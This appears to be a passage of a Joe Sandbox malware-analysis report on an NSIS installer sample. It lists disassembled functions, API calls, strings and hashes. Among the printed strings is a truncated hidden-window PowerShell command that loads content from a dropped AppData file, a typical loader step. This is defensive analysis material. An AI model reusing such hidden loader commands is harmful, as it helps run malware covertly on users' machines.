        • Instruction Fuzzy Hash: 5E61C271A01204ABDB20DF65DD85B9E7BB8EB04355F20417BFA00F62D1CB7C9A458B9D
        Function 00406234 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 430 406234-40623f 431 406241-406250 430->431 432 406252-406268 430->432 431->432 433 406480-406486 432->433 434 40626e-40627b 432->434 436 40648c-406497 433->436 437 40628d-40629a 433->437 434->433 435 406281-406288 434->435 435->433 438 4064a2-4064a3 436->438 439 406499-40649d call 406212 436->439 437->436 440 4062a0-4062ac 437->440 439->438 442 4062b2-4062ee 440->442 443 40646d 440->443 444 4062f4-4062ff GetVersion 442->444 445 40640e-406412 442->445 446 40647b-40647e 443->446 447 40646f-406479 443->447 448 406301-406305 444->448 449 406319 444->449 450 406414-406418 445->450 451 406447-40644b 445->451 446->433 447->433 448->449 457 406307-40630b 448->457 454 406320-406327 449->454 452 406428-406435 call 406212 450->452 453 40641a-406426 call 406159 450->453 455 40645a-40646b lstrlenW 451->455 456 40644d-406455 call 406234 451->456 468 40643a-406443 452->468 453->468 459 406329-40632b 454->459 460 40632c-40632e 454->460 455->433 456->455 457->449 463 40630d-406311 457->463 459->460 466 406330-406356 call 4060df 460->466 467 40636a-40636d 460->467 463->449 464 406313-406317 463->464 464->454 478 4063f5-4063f9 466->478 479 40635c-406365 call 406234 466->479 471 40637d-406380 467->471 472 40636f-40637b GetSystemDirectoryW 467->472 468->455 470 406445 468->470 474 406406-40640c call 4064a6 470->474 476 406382-406390 GetWindowsDirectoryW 471->476 477 4063eb-4063ed 471->477 475 4063ef-4063f3 472->475 474->455 475->474 475->478 476->477 477->475 480 406392-40639c 477->480 478->474 485 4063fb-406401 lstrcatW 478->485 479->475 482 4063b6-4063cc SHGetSpecialFolderLocation 480->482 483 40639e-4063a1 480->483 488 4063e7 482->488 489 4063ce-4063e5 SHGetPathFromIDListW CoTaskMemFree 482->489 483->482 487 4063a3-4063aa 483->487 485->474 491 4063b2-4063b4 487->491 488->477 489->475 489->488 491->475 491->482
        APIs
        • GetVersion.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,?,004053A8,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000), ref: 004062F7
        • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 00406375
        • GetWindowsDirectoryW.KERNEL32(004281E0,00000400), ref: 00406388
        • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004063C4
        • SHGetPathFromIDListW.SHELL32(?,004281E0), ref: 004063D2
        • CoTaskMemFree.OLE32(?), ref: 004063DD
        • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406401
        • lstrlenW.KERNEL32(004281E0,00000000,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,?,004053A8,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000), ref: 0040645B
        Strings
        • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004063FB
        • powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Bl, xrefs: 0040642E
        • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406343
        • C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\, xrefs: 00406259
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
        • String ID: C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Bl
        • API String ID: 900638850-1834415137
        • Opcode ID: a900ca9bf6153fc6656b4f670c8f5ecdb0e059a5c91e72301d0c84f9da171f8e
        • Instruction ID: 8986ea92d4020f82ea273b0cadebf120af401304848ce5cddb84501886c13395
        • Opcode Fuzzy Hash: a900ca9bf6153fc6656b4f670c8f5ecdb0e059a5c91e72301d0c84f9da171f8e
        • Instruction Fuzzy Hash: C661E371A00115EBDB209F24CD40AAE37A5AF50314F52817FE947BA2D0D73D8AA6CB9D
        Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 556 40176f-401794 call 402c53 call 405c3d 561 401796-40179c call 406212 556->561 562 40179e-4017b0 call 406212 call 405bc6 lstrcatW 556->562 567 4017b5-4017b6 call 4064a6 561->567 562->567 571 4017bb-4017bf 567->571 572 4017c1-4017cb call 406555 571->572 573 4017f2-4017f5 571->573 580 4017dd-4017ef 572->580 581 4017cd-4017db CompareFileTime 572->581 574 4017f7-4017f8 call 405dc2 573->574 575 4017fd-401819 call 405de7 573->575 574->575 583 40181b-40181e 575->583 584 40188d-4018b6 call 405371 call 40317b 575->584 580->573 581->580 585 401820-40185e call 406212 * 2 call 406234 call 406212 call 405957 583->585 586 40186f-401879 call 405371 583->586 596 4018b8-4018bc 584->596 597 4018be-4018ca SetFileTime 584->597 585->571 618 401864-401865 585->618 598 401882-401888 586->598 596->597 600 4018d0-4018db CloseHandle 596->600 597->600 601 402ae4 598->601 605 4018e1-4018e4 600->605 606 402adb-402ade 600->606 604 402ae6-402aea 601->604 608 4018e6-4018f7 call 406234 lstrcatW 605->608 609 4018f9-4018fc call 406234 605->609 606->601 615 401901-4022fc call 405957 608->615 609->615 615->604 615->606 618->598 620 401867-401868 618->620 620->586
        APIs
        • lstrcatW.KERNEL32(00000000,00000000,%TMP%,C:\Users\user\AppData\Roaming\afdragsordning,?,?,00000031), ref: 004017B0
        • CompareFileTime.KERNEL32(-00000014,?,%TMP%,%TMP%,00000000,00000000,%TMP%,C:\Users\user\AppData\Roaming\afdragsordning,?,?,00000031), ref: 004017D5
          • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
          • Part of subcall function 00405371: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
          • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
          • Part of subcall function 00405371: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000), ref: 004053CC
          • Part of subcall function 00405371: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\), ref: 004053DE
          • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
          • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
          • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
        • String ID: %TMP%$C:\Users\user\AppData\Roaming\afdragsordning$loyolism
        • API String ID: 1941528284-686795545
        • Opcode ID: 00536d43247b0e684560901737a3663a089175b994d03775e1e0762796f7db5e
        • Instruction ID: 0d28a5e8dae66ca407d9ab1903032e249cf50254bac70f3abe216f7737186e0f
        • Opcode Fuzzy Hash: 00536d43247b0e684560901737a3663a089175b994d03775e1e0762796f7db5e
        • Instruction Fuzzy Hash: 0541B131900119BACF217BA5CD45DAF3A79EF01368B20427FF422B10E1DB3C8A519A6E
        Function 00405371 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 622 405371-405386 623 40538c-40539d 622->623 624 40543d-405441 622->624 625 4053a8-4053b4 lstrlenW 623->625 626 40539f-4053a3 call 406234 623->626 628 4053d1-4053d5 625->628 629 4053b6-4053c6 lstrlenW 625->629 626->625 631 4053e4-4053e8 628->631 632 4053d7-4053de SetWindowTextW 628->632 629->624 630 4053c8-4053cc lstrcatW 629->630 630->628 633 4053ea-40542c SendMessageW * 3 631->633 634 40542e-405430 631->634 632->631 633->634 634->624 635 405432-405435 634->635 635->624
        APIs
        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
        • lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000), ref: 004053CC
        • SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\), ref: 004053DE
        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend$lstrlen$TextWindowlstrcat
        • String ID: C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\
        • API String ID: 2531174081-2186736354
        • Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
        • Instruction ID: a3987805c55db6f4a015f8fdfae83c311b34e51693a8fcc51f5c24f156ed4de6
        • Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
        • Instruction Fuzzy Hash: A3218C71900518BBCB119F95ED84ACFBFB8EF45350F50807AF904B62A0C3B98A91DF68
        Function 00405840 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 636 405840-40588b CreateDirectoryW 637 405891-40589e GetLastError 636->637 638 40588d-40588f 636->638 639 4058b8-4058ba 637->639 640 4058a0-4058b4 SetFileSecurityW 637->640 638->639 640->638 641 4058b6 GetLastError 640->641 641->639
        APIs
        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
        • GetLastError.KERNEL32 ref: 00405897
        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004058AC
        • GetLastError.KERNEL32 ref: 004058B6
        Strings
        • C:\Users\user\Desktop, xrefs: 00405840
        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405866
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: ErrorLast$CreateDirectoryFileSecurity
        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
        • API String ID: 3449924974-1521822154
        • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
        • Instruction ID: cbd092c4ebd5e7b47652c6b2ce971f8280a433404df7830fbb595f789125ae90
        • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
        • Instruction Fuzzy Hash: 43011A72D00619DAEF10EFA0C9447EFBBB8EF04344F00803AD944B6280E7789614CF99
        Function 0040657C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 642 40657c-40659c GetSystemDirectoryW 643 4065a0-4065a2 642->643 644 40659e 642->644 645 4065b3-4065b5 643->645 646 4065a4-4065ad 643->646 644->643 648 4065b6-4065e9 wsprintfW LoadLibraryExW 645->648 646->645 647 4065af-4065b1 646->647 647->648
        APIs
        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
        • wsprintfW.USER32 ref: 004065CE
        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004065E2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: DirectoryLibraryLoadSystemwsprintf
        • String ID: %s%S.dll$UXTHEME$\
        • API String ID: 2200240437-1946221925
        • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
        • Instruction ID: 5ba2db083709ae0eaf9cf6759a8f1877d4d75d4363d7664b3b34a8d65426c280
        • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
        • Instruction Fuzzy Hash: 4AF0F670910219FADF10AB64EE0EF9B366CAB00304F50403AA546F11D0EB7CDA25CBA8
        Function 00405E16 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 649 405e16-405e22 650 405e23-405e57 GetTickCount GetTempFileNameW 649->650 651 405e66-405e68 650->651 652 405e59-405e5b 650->652 653 405e60-405e63 651->653 652->650 654 405e5d 652->654 654->653
        APIs
        • GetTickCount.KERNEL32 ref: 00405E34
        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00403448,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405E4F
        Strings
        • "C:\Users\user\Desktop\Ej86aa7Ki7.exe", xrefs: 00405E16
        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E1B
        • nsa, xrefs: 00405E23
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CountFileNameTempTick
        • String ID: "C:\Users\user\Desktop\Ej86aa7Ki7.exe"$C:\Users\user\AppData\Local\Temp\$nsa
        • API String ID: 1716503409-1720690683
        • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
        • Instruction ID: 4cf6052b0ced346fb1ee4b1f894cf66bb827df7868a0d4c9989a51242fd2e3ec
        • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
        • Instruction Fuzzy Hash: 9BF09076700608FBDB008F59DD05A9BBBBDEB95750F10403AFD40F7180E6B09A548B64
        Function 004023EA Relevance: 6.1, APIs: 4, Instructions: 73registrystringCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 655 4023ea-402430 call 402d48 call 402c53 * 2 RegCreateKeyExW 662 402436-40243e 655->662 663 402adb-402aea 655->663 665 402440-40244d call 402c53 lstrlenW 662->665 666 402451-402454 662->666 665->666 669 402456-402467 call 402c31 666->669 670 402468-40246b 666->670 669->670 671 40247c-402490 RegSetValueExW 670->671 672 40246d-402477 call 40317b 670->672 677 402492 671->677 678 402495-402573 RegCloseKey 671->678 672->671 677->678 678->663 680 4028a1-4028a8 678->680 680->663
        APIs
        • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402428
        • lstrlenW.KERNEL32(0040B5D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402448
        • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402488
        • RegCloseKey.ADVAPI32(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CloseCreateValuelstrlen
        • String ID:
        • API String ID: 1356686001-0
        • Opcode ID: e40e8b1c96886283aa3593c8b640164b0f5af0ed5c68d9aeec9e78129a152cd5
        • Instruction ID: 4be5953a60dfee5a88bc6a75bc26a7970e9a4d525f64453ad6d2d9daaf41070d
        • Opcode Fuzzy Hash: e40e8b1c96886283aa3593c8b640164b0f5af0ed5c68d9aeec9e78129a152cd5
        • Instruction Fuzzy Hash: 85216F71E00118BFEB10AFA4DE89DAE7B78EB04358F11843AF505B71D1DBB88D419B68
        Function 00401ED5 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 681 401ed5-401ee6 call 402c53 call 405371 call 4058f2 687 401eeb-401ef0 681->687 688 4028a1-4028a8 687->688 689 401ef6-401ef9 687->689 690 402adb-402aea 688->690 691 401f4a-401f53 CloseHandle 689->691 692 401efb-401f0b WaitForSingleObject 689->692 691->688 691->690 694 401f1b-401f1d 692->694 696 401f0d-401f19 call 406628 WaitForSingleObject 694->696 697 401f1f-401f2f GetExitCodeProcess 694->697 696->694 698 401f31-401f3c call 406159 697->698 699 401f3e-401f41 697->699 698->691 699->691 702 401f43 699->702 702->691
        APIs
          • Part of subcall function 00405371: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
          • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
          • Part of subcall function 00405371: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000), ref: 004053CC
          • Part of subcall function 00405371: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\), ref: 004053DE
          • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
          • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
          • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
          • Part of subcall function 004058F2: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
          • Part of subcall function 004058F2: CloseHandle.KERNEL32(?), ref: 00405928
        • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401F04
        • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401F19
        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401F26
        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401F4D
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
